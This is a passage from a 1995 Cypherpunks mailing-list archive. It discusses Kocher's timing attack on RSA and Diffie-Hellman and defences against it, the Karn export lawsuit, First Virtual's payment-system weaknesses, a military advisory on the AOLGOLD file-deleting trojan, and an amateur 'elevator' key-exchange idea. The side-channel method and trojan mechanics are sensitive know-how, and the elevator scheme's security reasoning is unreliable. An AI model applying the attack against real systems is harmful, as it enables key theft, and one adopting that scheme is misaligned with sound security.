on (e.g. make a bunch of connections using Diffie-Hellman), you can guess different bits each time, and gradually get the whole thing. It helps to watch this a number of times to get better statistics, so you can tell what's real calculation and what's just speed-randomness. Obviously, it also helps if you're running a program on the same machine as the target you're trying to hit, but you can still gain some information if you're running across a network and having to estimate random network delays. In these cases, you just have to watch longer to get stats. A common algorithm for doing modular exponentiation (the core of the Diffie-Hellman and RSA algorithms) looks like this: To calculate y**x mod m (all this arithmetic is multiple-precision) (and maybe there's an off-by-one error or two in this :-) This uses successive squaring to do the calculation in log2(x) time instead of just doing x multiplies by y, which would be very slow since x is typically 500-1000 bits long... Remember that multiplying two 1024-bit numbers typically involves multiplying two arrays of 32 numbers 32 bits long, which takes 32*32 or 1024 multiply steps. And modulo calculations are also slow. prod = 1 square = y log2x = number of bits in x for i = 1 to log2x+1 { if (x odd) then { prod = prod * square if ( prod > m ) then prod = prod mod m } # else if (x even), don't bother square = square * square if (square > m) square = square mod m x = x / 2 } You can figure out the timing for the squaring calculations yourself. Since you get to pick y, you can manipulate it to guess a bit about how long x is, and notice from the different timings how many times there was a prod*square calculation (which tells you how many bits were odd), as well as how many prod mod m calculations. You can get a certain amount of defense by keeping around prod1 and prod2, and calculating prod1 = prod1 * square (the real value) for odd and prod2 = prod2 * square (a dummy you'll discard later) for even, and doing something useful to obscure the mod m calculations, like keeping a dummy around to divide if prod1 or prod2 is less than m. Aside from slowing things down by 50%, if you're not careful, there's still information that leaks from the timing. For other algorithms, sometimes the calculations you've got to do timings on are more subtle, like DES, but you can still often guess things, and Paul gives a bunch of calculations for these. They're more statistical, since the effects you're chasing are subtler, but you still get information. #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From lull at acm.org Tue Dec 12 00:56:56 1995 From: lull at acm.org (John Lull) Date: Tue, 12 Dec 1995 16:56:56 +0800 Subject: Timing Attacks In-Reply-To: <9512112205.AA07602@toad.com> Message-ID: <30cd30bd.1863868@smtp.ix.netcom.com> On Mon, 11 Dec 1995 17:04:56 -0500 (EST), Eli Brandt wrote: > Also, it's not just networked machines. Smart cards may have a hard > time defending themselves against hostile card readers. They're slow > already; the user may not appreciate the extra time spent for > obfuscation. (This depends critically on the numbers, of course.) Smart card have one major advantage, though. During these types of operations, a smart card will be totally dedicated to the crypto. Calculating the maximum possible delay for a given key size should be relatively easy. Most single-chip micros also have a timer that could be readily dedicated to counting out this maximum possible delay, and the result held only that long. This could, on an 8051 (as a fairly typical example) be easily controlled (with a 1-instruction loop) to within 2 instruction cycles. Given another dozen or so instructions, it can be controlled to a single fixed delay. Where minimum and maximum delays only differ by 1% or so for a given key size, no one will ever notice the extra time required to hold the result for the maximum possible delay. From karn at unix.ka9q.ampr.org Tue Dec 12 02:23:46 1995 From: karn at unix.ka9q.ampr.org (Phil Karn) Date: Tue, 12 Dec 1995 18:23:46 +0800 Subject: Plaintiff's Opposition in Karn vs State Dept Message-ID: <199512120910.BAA05272@unix.ka9q.ampr.org> On Monday, December 11, my attorneys filed a Plaintiff's Opposition to Defendants' Motion to Dismiss in the case of Karn vs US Dept of State et al. I have HTMLized our filings and added them to my web page. Please feel free to peruse them. Also, let me know if you spot any obvious typos; I had to do quite a bit of manual editing, particularly in the footnotes, to make the result look good in HTML. The government now gets the chance to answer our opposition. They were originally scheduled to do by December 13, but since our own filing was delayed over the weekend by the judge's concurrence the government will probably get a few extra days to respond. Note that we have asked to make oral arguments on the motion. I'll let everyone know if or when this will happen. The web page is: http://www.qualcomm.com/people/pkarn/export Phil From tallpaul at pipeline.com Tue Dec 12 20:14:06 1995 From: tallpaul at pipeline.com (tallpaul) Date: Tue, 12 Dec 95 20:14:06 PST Subject: The Elevator Problem Message-ID: <199512130413.XAA04532@pipe4.nyc.pipeline.com> OK. I'll bite. I realize that whenever non-heavy crypto people tackle heavy crypto problems, the answers are virtually always: (a) obviously wrong; (b) proposed 400 years ago; (c) not even related to the original question; (d) all of the above. Alice says to Bob, in front of all of the other people on the elevator: "I have generated a large(ish) amount of large(ish) prime numbers and have recorded all of them. I have multipled two of the numbers to get an even larger non-prime number. I have done this a large(ish) number of times until I have a 'large(ish)/2' set of non-prime numbers. The elements of this set are [Alice reads off the set of non-prime numbers and Bob along with the other people on the elevator record them.] Bob, go home and pick one of the non-prime numbers in the set. Factor it. Use the largest prime as a private key in your message to me. Since I know what the numbers all are, I'll try all of them to see which one decrypts your message." Bob has to factor one large(ish) prime. Alice has to *try* an average of "large(ish)/2" private keys to decrypt Bob's message. The other people on the elevator have to *factor* an average of "large(ish)/2/2" number of large(ish) numbers to decrypt the message. The *relative* security then depends on the number of digits in the large(ish) primes and the number of products in the set Alice reads to Bob. E.G. Imagine that Alice previously generates 2,000,000 prime numbers, giving her a set of 1,000,000 products. Neither Bob nor anyone else on the elevator knows the 2,000,000 primes that Alice has generated. She reads all 1,000,000 products to Bob and everyone else on the elevator. Imagine that any given product can be factored in 100 MIP days (i.e. a 100 MHz Pentium running for 24 hours or "P-Day"). Bob factors one and only one of the numbers and uses the factor as a private key to generate the message. Neither Alice nor anyone else on the elevator knows what product Bob picked to factor. Alice receives the message. She takes the 2,000,000 privately recorded primes and runs a brute force attack on the encrypted message, decrypting it in an average of 1,000,000 tries. The other people on the elevator need to factor each number and then run it has a brute force attempt to decrypt the message. This takes them an average of 500,000 P-Days to factor the numbers plus whatever the brute force time requires. The relative security develops because it is faster to generate large(ish) primes and to brute force decryption then to factor the large(ish) primes. The absolute time it takes to generate the primes and to brute force the decryption sets the relative time Alice is willing to spend to get a different relative level of security. If the nasties are the NSA, then 500,000 P-Days is too insecure. If the nasties are Alice and Bob's nosey neighbor, then 500,000 P-Days is "excessively" secure. If Alice and Bob are sweet patooties, and the nasty is Alice's father who runs the comp sci department at the university, then 500,000 P-Days is about right. Now, if any of you want to waste some time, you can play "kick the newbie" re points (a) through (d) above. --tallpaul From ses at tipper.oit.unc.edu Tue Dec 12 08:56:02 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Wed, 13 Dec 1995 00:56:02 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <30CC0D31.293C@netscape.com> Message-ID: On Mon, 11 Dec 1995, Jeff Weinstein wrote: > > While an exploit of this attack against our software has not > been demonstrated, and there is some debate about whether it > will even work, we are taking it very seriously. We've been > working with Paul to develop a fix, which we will implement > even if the attack is never proven effective against our software. > My gut & scribble-on-the-back-of-a-napkin feeling about this class of attack is that it could be a problem for smartcards (almost certainly), and possibly for non-routed networks (possibly - napkin was too small :-), but is not going to viable on internetworks where routers are in use; if a packet enters a queue at any point in its path, then the transit time will be quantised by the time it drains the queue, which is basically controlled by the time it takes to drain previously queued packets; this will destroy any microsecond level correlations that may have been leaked. Ron is supposed to be doing a presentation at WWW IV later this week - hopefully he'll give his opinion on this. Definitely a really neat hack, even if it isn't always practical. Simon p.s. Someone mentioned adding random timings instead of padding out to a constant time. This won't work (adding noise doesn't destroy a signal - just increases the effort needed to isolate it) From combee at w3.org Tue Dec 12 09:08:45 1995 From: combee at w3.org (Ben Combee) Date: Wed, 13 Dec 1995 01:08:45 +0800 Subject: EXON In-Reply-To: Message-ID: <199512121612.KAA14837@matrix.eden.com> > Could someone please explain to me what this "EXON" thing is?? EXON is a control character sent to some terminals to stop input and output. To restore normal mode, you send an EXOFF. See an ASCII chart for the exact figures. (Yes, I am just being a little sarcastic. But, you know, EXON would stop input and output, so the analogy is a little scary... anyway, Exon is a gas station, right?) -- eebmoC .L nimajneB | Benjamin L. Combee (REVERSE) gro.doowhcet at eebmoc | combee at techwood.org (ENGINEERING) \eebmoc\ten.kay.www\\:ptth | http://www.yak.net/combee/ (RESERVE) From adam at lighthouse.homeport.org Tue Dec 12 09:21:21 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Wed, 13 Dec 1995 01:21:21 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <199512111920.LAA24338@mycroft.rand.org> Message-ID: <199512121525.KAA09078@homeport.org> Jim Gillogly wrote: | > Nathaniel Borenstein writes: | > Hey, don't go for constant time, that's too hard to get perfect. Add a | > *random* delay. This particular crypto-flaw is pretty easy to fix. | > (See, I'm not *always* arguing the downside of cryptography!) | | Random delay may be harder to get perfect than constant time. Note that | the actual time for the transaction is the minimum of all the transaction | times you measure, since you can't add a negative delay to them. It's | presumably even easier if the random distribution is known. Adding a | random delay means more transactions are required to find each new bit, | but information is still leaking. Does the delay have to be random, or does the total time for a transacation need to be unrelated to the bits in the secret key? Assume that the time added is pseudo-random (and confidential). Further, for any non-overlapping group of N transactions, the distribution of the times fits some predetermined curve, say a bell curve. We've added a non random number, but since those numbers end up being a curve, it would be difficult to determine which transaction got which time added to it. This resembles the 'make them all a constant time', but allows us to send out some in a shorter time than the maximum (although most transactions should probably take longer than the average.) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From nsb at nsb.fv.com Tue Dec 12 09:24:14 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Wed, 13 Dec 1995 01:24:14 +0800 Subject: Hacking FV is just no fun (was Re: More FUD from First Virtual [NOISE]) In-Reply-To: <199512120743.XAA24011@infinity.c2.org> Message-ID: Watching this thread has been fascinating. I want to underscore and summarize a tiny bit. First, I commented about the aspects of FV's system that made it particularly hard to mount a large-scale automated attack against the FV transaction system. Then, David Wagner asked: > Is it just me, or does this sound like a challenge? ..... > Maybe Sameer will create a Hack FV page :-) > Or maybe NB will offer a $1000 bug bounty to anyone who can successfully > forge a transaction in FV's system (since it's so foolproof)... Before I could answer, Sameer said more or less what I would have said, although I'm sure he didn't think he was offering FV's position: > FV isn't worth it. This is absolutely true in the sense that a simple one-time attack on FV is well-understood and easy to mount. (For those of you who haven't seen it, I recommend that you read our paper on lessons from First Virtual's first full year in operation, available at ftp::/ftp.fv.com/pub/nsb/fv-austin.{ps,txt}. Among other things, it spells out in precise detail how to break the FV transaction system -- see Appendix A, Question 25: "How can a criminal break First Virtual's system, and does it matter?" Unlike other systems, FV doesn't claim to be "foolproof" -- quite the contrary, we very deliberately tell you exactly how to break the system, and we focus on limiting the damage that can be done by such an attack. Given that fact, a bounty is ludicrous. We're not going to turn around and pay you a bounty for doing exactly what we told you how to do! A bounty on crypto-payment-systems makes sense precisely because the possible costs of a bug can be so high. However, Sameer went on to write: > Actually, Hack FV seems pretty pointless. Someone hacks FV, > and a chargeback is issued on the credit card. Big deal. Same old > outdated credit-card based payment systems. > No more secure than credit cards. This last line is not quite right. The email loop that FV adds will, in general, cause fraud to be detected far more quickly than it is detected in today's credit card world. Thus FV is a bit more robust (if not more "secure", a word fraught with problems of definition) than the physical credit card infrastructure. Using encrypted credit cards on the net, however, is demonstrably *less* secure/robust than the existing physical credit card infrastructure, as the first-year paper also explains in detail. Finally, Bill and Sameer (jointly, sort of) provided a very brief synopsis of the "does it matter?" part: > > Besides, if you hack FV you've got the money :-) > Uh, no you don't. I can't think of any ways you could hack FV > and actually make money at it, because in the end the credit card would just get a chargeback. FV is vulnerable to several nuisance attacks, and we make no bones about that fact. We've even seen it happen a couple of times -- no money was lost, and the culprit was persuaded to cease and desist via pressure through his ISP. But we've designed the system to be very robust in protecting the actual money, which is what we believe MUST be a payment system's first priority. -- Nathaniel -------- Nathaniel Borenstein (FAQ & PGP key: nsb+faq at nsb.fv.com) Chief Scientist, First Virtual Holdings VIRTUAL YELLOW RIBBON==> http://www.netresponse.com/zldf From ljo at ausys.se Tue Dec 12 09:26:07 1995 From: ljo at ausys.se (Johansson Lars) Date: Wed, 13 Dec 1995 01:26:07 +0800 Subject: Blinding against Kocher's timing attacks Message-ID: <95Dec12.160243gmt+0100.53783@void.ausys.se> Ron Rivest wrote (at sci.crypt): >The simplest way to defeat Kocher's timing attack is to ensure that the >cryptographic computations take an amount of time that does not depend on the >data being operated on. For example, for RSA it suffices to ensure that >a modular multiplication always takes the same amount of time, independent of >the operands. > >A second way to defeat Kocher's attack is to use blinding: you "blind" the >data beforehand, perform the cryptographic computation, and then unblind >afterwards. For RSA, this is quite simple to do. (The blinding and >unblinding operations still need to take a fixed amount of time.) This doesn't >give a fixed overall computation time, but the computation time is then a >random variable that is independent of the operands. Does anyone know whether David Chaum's patent on blind digital signatures extends to this application? Kind regards, /Lars Johansson ljo at ausys.se http://www.ausys.se/defaulte.htm From perry at piermont.com Tue Dec 12 09:27:58 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 13 Dec 1995 01:27:58 +0800 Subject: Timing Attack Paper In-Reply-To: Message-ID: <199512121321.IAA02041@jekyll.piermont.com> Giles Bowkett writes: > http://www.cryptography.com/timingattack.html > > and found the whole thing to be totally incomprehensible from > a layman's point of view. I apologize for having not read > "Applied Cryptography", which might have made the abstract a > simpler read - but even if I had I'd have been baffled by a > lot of the terminology and equations in this paper. If you had read and understood Applied Cryptography you would understand the paper. I'm sorry, but to paraphrase a smarter man than I, there is no royal road to cryptography. You have to study it. The only thing that can be said to a layman is that different keys will require different amounts of times to deal with different texts in certain public key systems, so by timing how long it takes to perform operations you can get information about the keys. Perry From WheatonB at 603cs.croughton.af.mil Tue Dec 12 09:46:03 1995 From: WheatonB at 603cs.croughton.af.mil (WheatonB at 603cs.croughton.af.mil) Date: Wed, 13 Dec 1995 01:46:03 +0800 Subject: AOGOLD Trojan Program Message-ID: <9511128188.AA818815153@603cs.croughton.af.mil> FYI. Thanks. ... Kev Kevin P. Knox, SSgt, USAF Systems Administrator, IP Network Manager Novell Certified NetWare Engineer Royal Air Force Croughton, United Kingdom Near Brackley, Northamptonshire My PGP public key can be obtained via anonymous FTP from nsc.croughton.af.mil (131.56.128.5) From: pch at assist.mil Subject: ASSIST 95-46, AOLGOLD Trojan Program. To: assist-bulletin at assist.mil Date sent: Mon, 4 Dec 1995 16:06:54 -0500 (EST) Copies to: assist at assist.mil -----BEGIN PGP SIGNED MESSAGE----- <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Automated Systems Security Incident Support Team _____ ___ ___ _____ ___ _____ | / /\ / \ / \ | / \ | | / Integritas / \ \___ \___ | \___ | | < et /____\ \ \ | \ | | \ Celeritas / \ \___/ \___/ __|__ \___/ | |_____\ <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Bulletin 95-46 Release date: 4 December, 1995, 4:00 PM EST (GMT -5) SUBJECT: AOLGOLD Trojan Program. SUMMARY: A trojan program called AOLGOLD.ZIP that deletes c: drive files when executed is being distributed around America Online and other networks. BACKGROUND: The AOLGOLD Trojan program was recently discovered on America Online (AOL). Notice about the Trojan has been circulated to all America Online subscribers. An e-mail message that contained an attached archive file named AOLGOLD.ZIP was circulated on AOL. A README file that is in the archive describes the fictitious AOLGOLD as a new and improved interface for the AOL online service. Reading or downloading the included file will not damage your system, the trojaned program must be executed for damage to occur. If you unzip the archive, you get two files: INSTALL.EXE and README.TXT. The README.TXT file again describes AOLGOLD as a new and improved interface to the AOL online service. The INSTALL.EXE program is a self-extracting ZIP archive. When you run the install program, it extracts 18 files onto your hard drive: MACROS.DRV VIDEO.DRV INSTALL.BAT ADRIVE.RPT SUSPEND.DRV ANNOY.COM MACRO.COM SP-NET.COM SP-WIN.COM MEMBRINF.COM DEVICE.COM TEXTMAP.COM HOST.COM REP.COM EMS2EXT.SYS EMS.COM EMS.SYS README.TXT The file list includes another README.TXT file. If you examine the new README.TXT file, it starts out with "Ever wanted the Powers of a Guide" and continues with some crude language. The README.TXT file indicates that the included program is a guide program that can be used to kick other people off of AOL. If you stop at this point and do nothing but examine the unzipped files with the TYPE command, your machine will not be damaged. The following three files contain the Trojan program: MACROS.DRV VIDEO.DRV INSTALL.BAT The rest of the files included in the archive appear to have been chosen at random and included to simply fill up the archive and make it look official. The Trojan program is started by running the INSTALL.BAT file. The INSTALL.BAT file is a simple batch file that renames the VIDEO.DRV file to VIRUS.BAT and then runs it. VIDEO.DRV is an amateurish DOS batch file that starts deleting the contents of several critical directories on your C: drive, including: c:\ c:\dos c:\windows c:\windows\system c:\qemm c:\stacker c:\norton It also deletes the contents of several other directories, including those for several online services and games, such as: c:\aol20 c:\prodigy c:\aol25 c:\mmp169 c:\cserve c:\doom c:\wolf3d When the batch file completes, it prints a crude message on the screen and attempts to run a program named DoomDay.EXE. Bugs in the batch file prevent the DOOMDAY.EXE program from running. Other bugs in the file cause it to delete itself if it is run from any drive but the C: drive. IMPACT: When the INSTALL.EXE program is executed, files on the users c: drive are deleted. RECOMMENDED SOLUTIONS: NOTE: Do not copy any files onto your hard disk before trying to recover your hard drive. The files are deleted with the DOS del command, and can be recovered with the DOS undelete command. The files are still on your disk, only the directory entries have been removed. If you copy any new files onto your hard disk, they will likely be written over the deleted files, making it impossible to recover the deleted files. If you have delete protection installed on your system, recovery will be relatively easy. If not, the DOS undelete command can be used, but you will have to supply the first letter of each file name as it is recovered. In many cases, you will probably want to restore the directories by reinstalling them from the original installation disks, but do that last. You must recover any unreplaceable files first using undelete and then replace any others by copying or reinstalling them from the distribution disks. To recover the system: (1) Boot the system with a clean, locked floppy containing the recovery program for the recovery files you have installed, or the DOS UNDELETE.EXE program if you do not have recovery files installed. (2) Type the VIRUS.BAT file to get a list of the directories the Trojan tried to delete. Ignore any directories that don't exist on your machine. (3) Run the recovery program and recover your files. You may have to help it find the recovery files, such as MIRROR, which will be in the root directory. You may have to recover the MIRROR file first and then use it to recover the other files. If you are using only the DOS undelete command, type: undelete directory where directory is the name of the directory to examine. To undelete the files in the dos directory, use: undelete c:\dos The undelete program will present you with a list of deleted files with the first letter replaced with a question mark. Without delete protection, you will have to supply this letter in order to undelete the file. (4) After you have restored as many files as you want or can using the UNDELETE command, replace any others by reinstalling them using the original installation disks. <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ASSIST would like to thank the Department of Energy CIAC for information contained in this bulletin. <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ASSIST is an element of the Defense Information Systems Agency (DISA), and provides service to the entire DoD community. Constituents of the DoD with questions about ASSIST or computer security issues, can contact ASSIST using one of the methods listed below. Non-DoD organizations/institutions, contact the Forum of Incident Response and Security Teams (FIRST) representative. To obtain a list of FIRST member organizations and their constituencies send an email to docserver at first.org with an empty "subject" line and a message body containing the line "send first-contacts". ASSIST Information Resources: To be included in the distribution list for the ASSIST bulletins, send your Milnet (Internet) e-mail address to assist-request at assist.mil. Back issues of ASSIST bulletins, and other security related information, are available from the ASSIST BBS at 703-607-4710, 327-4710, and through anonymous FTP from assist.mil (IP address 199.211.123.11). Note: assist.mil will only accept anonymous FTP connections from Milnet addresses that are registered with the NIC or DNS. If your system is not registered, you must provide your MILNET IP address to ASSIST before access can be provided. ASSIST Contact Information: PHONE: 800-357-4231, COMM 703-607-4700, DSN 327-4700. ELECTRONIC MAIL: assist at assist.mil. ASSIST BBS: COMM 703-607-4710, DSN 327-4710, leave a message for the "sysop". FAX: COMM 703-607-4735, DSN 607-4735 ASSIST uses Pretty Good Privacy (PGP) 2.6.2 as the digital signature mechanism for bulletins. PGP 2.6.2 incorporates the RSAREF(tm) Cryptographic Toolkit under license from RSA Data Security, Inc. A copy of that license is available via anonymous FTP from net-dist.mit.edu (IP 18.72.0.3) in the file /pub/PGP/rsalicen.txt, and through the world wide web from http://net-dist.mit.edu/pgp.html. In accordance with the terms of that license, PGP 2.6.2 may be used for non-commercial purposes only. Instructions for downloading the PGP 2.6.2 software can also be obtained from net-dist.mit.edu in the pub/PGP/README file. PGP 2.6.2 and RSAREF may be subject to the export control laws of the United States of America as implemented by the United States Department of State Office of Defense Trade Controls. The PGP signature information will be attached to the end of ASSIST bulletins. Reference herein to any specific commercial product, process, or service by trade name, trademark manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by ASSIST. The views and opinions of authors expressed herein shall not be used for advertising or product endorsement purposes. - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 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 =8gi/ - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBMMNldNH6sbnW3Io9AQEojQQAoRB5w3+MigtmYkosgh94ttXFwt77VJmC n8b5SVZgD4pmXss12ZLLvSsXC8/+4Kp4IyHKyvie/nu7mmEZN4RcDy2N3IGa6Rmk ydVqJ9BvCSxNUNwwdxOMPj/Cu5Pmv1ssoIDdXVXMn11n3Ti97HiElj3VJP7DlH8w ZNoFm4DydgM= =MKi5 -----END PGP SIGNATURE----- From fc at all.net Tue Dec 12 10:06:25 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Wed, 13 Dec 1995 02:06:25 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <199512121525.KAA09078@homeport.org> Message-ID: <9512121726.AA05382@all.net> > Jim Gillogly wrote: > > | > Nathaniel Borenstein writes: > | > Hey, don't go for constant time, that's too hard to get perfect. Add a > | > *random* delay. This particular crypto-flaw is pretty easy to fix. > | > (See, I'm not *always* arguing the downside of cryptography!) > > Does the delay have to be random, or does the total time for a > transacation need to be unrelated to the bits in the secret key? > Assume that the time added is pseudo-random (and confidential). > Further, for any non-overlapping group of N transactions, the > distribution of the times fits some predetermined curve, say a bell > curve. Random time won't save you - it just increases the noise, thus reducing the effective bandwidth of the covert channel. To get the time, I only need to do enough repetitions of the same computation to eliminate the effect of the randomness and I have the same resulting information about the key. The only way to completely remove covert channels is by making the measurable time completely independent of the actual time. One way with the RSA might be to do the encryption with the key and the inverse of the key (hence all 0s become 1s and 1s become 0s). -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 